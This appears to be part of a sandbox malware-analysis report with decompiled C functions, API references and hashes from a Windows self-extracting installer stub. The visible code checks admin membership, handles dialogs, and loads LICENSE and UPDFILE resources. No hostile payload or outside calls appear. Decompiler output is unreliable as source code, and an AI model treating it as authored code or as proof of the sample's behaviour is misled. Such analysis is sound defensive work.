				_v28 = __ecx;
				_t28 = 0;
				_t36 = LoadLibraryA("advapi32.dll");
				if(_t36 != 0) {
					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
					_v20 = _t20;
					if(_t20 != 0) {
						 *_t37 = 0;
						_t28 = 1;
						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
							_t37 = _t39;
							 *0x2fa288(0, _v24, _v28);
							_v20();
							if(_t39 != _t39) {
								asm("int 0x29");
							}
							FreeSid(_v24);
						}
					}
					FreeLibrary(_t36);
				}
				return E002F6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
			}

0x002f17f6
0x002f17fd
0x002f1805
0x002f180b
0x002f180d
0x002f1815
0x002f1818
0x002f1820
0x002f1824
0x002f182c
0x002f1832
0x002f1837
0x002f1851
0x002f1854
0x002f185d
0x002f1862
0x002f186c
0x002f1872
0x002f1877
0x002f187e
0x002f187e
0x002f1883
0x002f1883
0x002f185d
0x002f188a
0x002f188a
0x002f18a2

APIs

LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,002F18DD), ref: 002F181A
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 002F182C
AllocateAndInitializeSid.ADVAPI32(002F18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,002F18DD), ref: 002F1855
FreeSid.ADVAPI32(?,?,?,?,002F18DD), ref: 002F1883
FreeLibrary.KERNEL32(00000000,?,?,?,002F18DD), ref: 002F188A

Strings

CheckTokenMembership, xrefs: 002F1826
advapi32.dll, xrefs: 002F1810

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: FreeLibrary$AddressAllocateInitializeLoadProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 4204503880-1888249752
Opcode ID: 5a004d6a263dbf208e43242f7f18f224ce1382cf319db861a489943c9de05286
Instruction ID: 1b14045263fb625120d34731d28dff833e84008fcfaeba1454677503db5c78c5
Opcode Fuzzy Hash: 5a004d6a263dbf208e43242f7f18f224ce1382cf319db861a489943c9de05286
Instruction Fuzzy Hash: BD118471E10209EBDB109FA4EC4DBBEBB78EB44791F50017DFA05E2290DA319D20CB91

Uniqueness

Uniqueness Score: -1.00%

Function 002F3450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E002F3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) {
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) {
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E002F43D0(_t24, _t12);
					SetWindowTextA(_t24, "lega");
					SetDlgItemTextA(_t24, 0x838,  *0x2f9404);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) {
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) {
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
						goto L11;
					}
					 *0x2f91dc = 1;
					goto L8;
				}
				return 0;
			}

0x002f3459
0x002f345c
0x002f34d8
0x002f34de
0x00000000
0x002f34e0
0x002f345e
0x002f3463
0x002f349a
0x002f34a0
0x002f34a7
0x002f34b2
0x002f34c4
0x002f34cb
0x00000000
0x002f34cb
0x002f3468
0x002f346e
0x002f3474
0x00000000
0x00000000
0x002f347c
0x002f348c
0x002f3490
0x00000000
0x002f3496
0x002f3484
0x00000000
0x00000000
0x002f3486
0x00000000
0x002f3486
0x00000000

APIs

EndDialog.USER32(?,?), ref: 002F3490
GetDesktopWindow.USER32 ref: 002F349A
SetWindowTextA.USER32(?,lega), ref: 002F34B2
SetDlgItemTextA.USER32(?,00000838), ref: 002F34C4
SetForegroundWindow.USER32(?), ref: 002F34CB
EndDialog.USER32(?,00000002), ref: 002F34D8

Strings

lega, xrefs: 002F34AC

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: Window$DialogText$DesktopForegroundItem
String ID: lega
API String ID: 852535152-245445314
Opcode ID: 7cff73d7cf5323ffee96fdadeb0b121f9545ad569a064b14a4671cd802a2354b
Instruction ID: 6e270f991ba60f8f74998d9c809ee0a54fc330e97204e8576ba60c20d0904694
Opcode Fuzzy Hash: 7cff73d7cf5323ffee96fdadeb0b121f9545ad569a064b14a4671cd802a2354b
Instruction Fuzzy Hash: 01019271260119ABD7169F64EC0C97FBA64FB457E0F114030FB4B866A0C7709BA1DB81

Uniqueness

Uniqueness Score: -1.00%

Function 002F2AAC Relevance: 12.1, APIs: 8, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E002F2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0x2f8004; // 0x404cc811
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0x2f9a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E002F1680(_t65, E002F17C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E002F65E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E002F1680(_t65, E002F17C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);
							}
						}
						_t64 = CharNextA(_t64);
					}
					 *_t65 = _t17;
				}
				return E002F6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
			}

0x002f2aac
0x002f2ab7
0x002f2abc
0x002f2abe
0x002f2ac3
0x002f2ac6
0x002f2ac9
0x002f2ace
0x002f2ae6
0x002f2bdc
0x002f2bdc
0x002f2be0
0x00000000
0x00000000
0x002f2af2
0x002f2afc
0x002f2b00
0x002f2b05
0x002f2b05
0x002f2b0b
0x002f2bca
0x002f2bd1
0x002f2b11
0x002f2b18
0x002f2b26
0x002f2b99
0x002f2bc8
0x00000000
0x00000000
0x002f2b9b
0x002f2bae
0x002f2bb3
0x002f2bb5
0x002f2bb5
0x002f2bb8
0x002f2bb8
0x002f2bba
0x002f2bbb
0x00000000
0x002f2bb8
0x002f2b28
0x002f2b2e
0x002f2b33
0x002f2b39
0x002f2b3c
0x002f2b3c
0x002f2b3e
0x002f2b3f
0x002f2b55
0x002f2b5d
0x002f2b64
0x002f2b64
0x002f2b7a
0x002f2b7f
0x002f2b81
0x002f2b81
0x002f2b84
0x002f2b84
0x002f2b86
0x002f2b87
0x002f2bbf
0x002f2bc1
0x002f2bc1
0x002f2b26
0x002f2bda
0x002f2bda
0x002f2be6
0x002f2be6
0x002f2bf8

APIs

GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 002F2AE6
IsDBCSLeadByte.KERNEL32(00000000), ref: 002F2AF2
CharNextA.USER32(?), ref: 002F2B12
CharUpperA.USER32 ref: 002F2B1E
CharPrevA.USER32(?,?), ref: 002F2B55
CharNextA.USER32(?), ref: 002F2BD4

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
String ID:
API String ID: 571164536-0
Opcode ID: 441832e4800f04b6bb1c8b0e09c005b376555fa1de42065ddb445721fefd9624
Instruction ID: 24d58c3f36410a826d745306f751c6e744f7639b7ec4b5695734eb890df55afb
Opcode Fuzzy Hash: 441832e4800f04b6bb1c8b0e09c005b376555fa1de42065ddb445721fefd9624
Instruction Fuzzy Hash: 5241133411414A9EDB159F20DC58BFEFB699F57394F0400BAD9CA83202DB654EAACB51

Uniqueness

Uniqueness Score: -1.00%

Function 002F28E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E002F28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				char _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E002F2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						_t11 =  &_v32; // 0x2f3938
						_t68 = GetFileVersionInfoSizeA(_v12, _t11);
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									_t16 =  &_v32; // 0x2f3938
									if(GetFileVersionInfoA(_v12,  *_t16, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E002F2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E002F2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}

0x002f28f1
0x002f28f4
0x002f28f7
0x002f28f9
0x002f28fc
0x002f28ff
0x002f2901
0x002f2907
0x002f2a62
0x002f2a64
0x002f290d
0x002f290d
0x002f290f
0x002f2912
0x002f2920
0x002f2937
0x00000000
0x00000000
0x002f293d
0x002f2944
0x002f294a
0x002f294f
0x002f2a2f
0x002f2a32
0x002f2a34
0x002f2a37
0x002f2a41
0x00000000
0x00000000
0x002f2955
0x002f295e
0x002f2962
0x002f2969
0x002f296f
0x002f2974
0x002f297e
0x002f298c
0x002f2a20
0x002f2a21
0x002f2a27
0x002f2a4c
0x002f2a4f
0x002f2a50
0x002f2a53
0x002f2a56
0x002f2a5c
0x00000000
0x00000000
0x00000000
0x00000000
0x002f29b2
0x002f29b2
0x002f29b5
0x002f29bd
0x002f29c3
0x002f29cc
0x002f29d5
0x002f29d7
0x002f29da
0x002f29dd
0x002f29df
0x002f29ec
0x002f29f8
0x002f29fc
0x002f29ff
0x002f2a02
0x002f2a07
0x002f2a0a
0x002f2a0f
0x002f2a19
0x002f2a81
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x002f2a0f
0x002f298c
0x002f2974
0x002f2962
0x00000000
0x002f294f
0x002f2912
0x002f2a65
0x002f2a68
0x002f2a6c
0x002f2a6f
0x002f2a6f
0x002f2a7d

APIs

GlobalFree.KERNEL32 ref: 002F2A6F

Part of subcall function 002F2773: CharUpperA.USER32(404CC811,00000000,00000000,00000000), ref: 002F27A8
Part of subcall function 002F2773: CharNextA.USER32(0000054D), ref: 002F27B5
Part of subcall function 002F2773: CharNextA.USER32(00000000), ref: 002F27BC
Part of subcall function 002F2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 002F2829
Part of subcall function 002F2773: RegQueryValueExA.ADVAPI32(?,002F1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 002F2852
Part of subcall function 002F2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 002F2870
Part of subcall function 002F2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 002F28A0

GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,002F3938,?,?,?,?,-00000005), ref: 002F2958
GlobalLock.KERNEL32 ref: 002F2969
GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,002F3938,?,?,?,?,-00000005,?), ref: 002F2A21
GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,002F3938,?,?), ref: 002F2A81

Strings

89/, xrefs: 002F293D, 002F297E, 002F2940

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
String ID: 89/
API String ID: 3949799724-1886182873
Opcode ID: 3a92ec550343f6d85ae8f5596d9b08dadb2bd6b84387a1a234267161957bc7f4
Instruction ID: c7fe34c9fc78666a531faabc00f69e99ba02107ddfae73050dde6e4643659146
Opcode Fuzzy Hash: 3a92ec550343f6d85ae8f5596d9b08dadb2bd6b84387a1a234267161957bc7f4
Instruction Fuzzy Hash: AA512571A1021ADBDB21CF98D884ABEFBB5FF49750F14403AEA05E3251DB319965CF90

Uniqueness

Uniqueness Score: -1.00%

Function 002F43D0 Relevance: 10.6, APIs: 7, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E002F43D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0x2f8004; // 0x404cc811
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;
				_v48 = _v40.right - _v40.left;
				GetWindowRect(_t68,  &_v24);
				_v56 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);
				_v60 = GetDeviceCaps(_t69, 0xa);
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;
				}
				asm("cdq");
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
				if(_t59 >= 0) {
					_t63 = _v60;
					if(_t59 + _t53 > _t63) {
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;
				}
				return E002F6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}

0x002f43d0
0x002f43d8
0x002f43df
0x002f43e6
0x002f43ec
0x002f43f1
0x002f4400
0x002f4403
0x002f440b
0x002f4420
0x002f4429
0x002f4437
0x002f4444
0x002f4447
0x002f444d
0x002f4454
0x002f445b
0x002f4460
0x002f4461
0x002f4467
0x002f446f
0x002f4473
0x002f4473
0x002f4463
0x002f4463
0x002f4463
0x002f447a
0x002f4481
0x002f4484
0x002f448a
0x002f4492
0x002f4496
0x002f4496
0x002f4486
0x002f4486
0x002f4486
0x002f44b8

APIs

GetWindowRect.USER32(?,?), ref: 002F43F1
GetWindowRect.USER32(00000000,?), ref: 002F440B
GetDC.USER32(?), ref: 002F4423
GetDeviceCaps.GDI32(00000000,00000008), ref: 002F442E
GetDeviceCaps.GDI32(00000000,0000000A), ref: 002F443A
ReleaseDC.USER32(?,00000000), ref: 002F4447
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 002F44A2

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: Window$CapsDeviceRect$Release
String ID:
API String ID: 2212493051-0
Opcode ID: a0e52f0c524671f4a72690abc63779c2e292e5c7015d861f076fe74ff6867379
Instruction ID: adfc6e48bef7062ff73ae22220ae05c65e2e8e6cbfd209e7c6ac3cca321d2465
Opcode Fuzzy Hash: a0e52f0c524671f4a72690abc63779c2e292e5c7015d861f076fe74ff6867379
Instruction Fuzzy Hash: 90313772A10119AFCB14DFB8ED889FEBBB5EB89350F154169E909B3240DA70AC05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 002F6298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E002F6298(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				char _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0x2f8004; // 0x404cc811
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v32 = __ecx;
				_v36 = 0;
				_t36 = 1;
				E002F171E( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break;
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0x2f9124 = 0x80070714;
						_t36 = _t46;
					} else {
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						 *0x2fa288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							E002F171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E002F6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}

0x002f6298
0x002f62a0
0x002f62a7
0x002f62ad
0x002f62af
0x002f62bb
0x002f62c3
0x002f62c4
0x002f633b
0x002f633b
0x002f6345
0x002f634d
0x00000000
0x00000000
0x002f62da
0x002f62de
0x002f635f
0x002f6369
0x002f62e0
0x002f62e0
0x002f62e0
0x002f62e3
0x002f62e5
0x002f62e5
0x002f62e8
0x002f62e8
0x002f62ea
0x002f62eb
0x002f62ef
0x002f62f1
0x002f62f3
0x002f6302
0x002f6308
0x002f630d
0x002f6314
0x002f6314
0x002f6316
0x002f6319
0x002f6355
0x002f6357
0x002f631b
0x002f631b
0x002f6331
0x002f6334
0x002f6339
0x00000000
0x002f6339
0x002f6319
0x002f636b
0x002f637d
0x002f637d
0x00000000

APIs

Part of subcall function 002F171E: _vsnprintf.MSVCRT ref: 002F1750

LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,002F51CA,00000004,00000024,002F2F71,?,00000002,00000000), ref: 002F62CD
LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,002F51CA,00000004,00000024,002F2F71,?,00000002,00000000), ref: 002F62D4
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,002F51CA,00000004,00000024,002F2F71,?,00000002,00000000), ref: 002F631B
FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 002F6345
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,002F51CA,00000004,00000024,002F2F71,?,00000002,00000000), ref: 002F6357

Strings

UPDFILE%lu, xrefs: 002F62B3, 002F6329

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: Resource$Free$FindLoadLock_vsnprintf
String ID: UPDFILE%lu
API String ID: 2922116661-2329316264
Opcode ID: dc82a22d03394d7917a149cdc2c57b89ff42c0bbf611a3dc7e2265b948a5aa9a
Instruction ID: e2ad1d6fc3f81ce5f595cc9ad7760bb12cf364508f8febefa43cbf67b68255a4
Opcode Fuzzy Hash: dc82a22d03394d7917a149cdc2c57b89ff42c0bbf611a3dc7e2265b948a5aa9a
Instruction Fuzzy Hash: 6721F875A1021D9BDB109F64AC4D9BFFB78EB45790B000179FA06A3241DB759D21CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 002F3A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E002F3A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E002F468F(_t16, 0, 0) + 1; // 0x1
				_t3 = LocalAlloc(0x40, _t1);
				 *0x2f8d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E002F468F(_t16, _t3, _t28) != 0) {
						if(lstrcmpA( *0x2f8d4c, "<None>") == 0) {
							LocalFree( *0x2f8d4c);
							L9:
							 *0x2f9124 = 0;
							return 1;
						}
						_t9 = E002F6517(_t19, 0x7d1, 0, E002F3100, 0, 0);
						LocalFree( *0x2f8d4c);
						if(_t9 != 0) {
							goto L9;
						}
						 *0x2f9124 = 0x800704c7;
						L2:
						return 0;
					}
					E002F44B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0x2f8d4c);
					 *0x2f9124 = 0x80070714;
					goto L2;
				}
				E002F44B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x2f9124 = E002F6285();
				goto L2;
			}

0x002f3a46
0x002f3a57
0x002f3a5d
0x002f3a63
0x002f3a6a
0x002f3a91
0x002f3a9a
0x002f3ad8
0x002f3b13
0x002f3b19
0x002f3b1b
0x00000000
0x002f3b21
0x002f3ae7
0x002f3af4
0x002f3afc
0x00000000
0x00000000
0x002f3afe
0x002f3a87
0x00000000
0x002f3a87
0x002f3aa8
0x002f3ab3
0x002f3ab9
0x00000000
0x002f3ab9
0x002f3a78
0x002f3a82
0x00000000

APIs

Part of subcall function 002F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002F46A0
Part of subcall function 002F468F: SizeofResource.KERNEL32(00000000,00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46A9
Part of subcall function 002F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002F46C3
Part of subcall function 002F468F: LoadResource.KERNEL32(00000000,00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46CC
Part of subcall function 002F468F: LockResource.KERNEL32(00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46D3
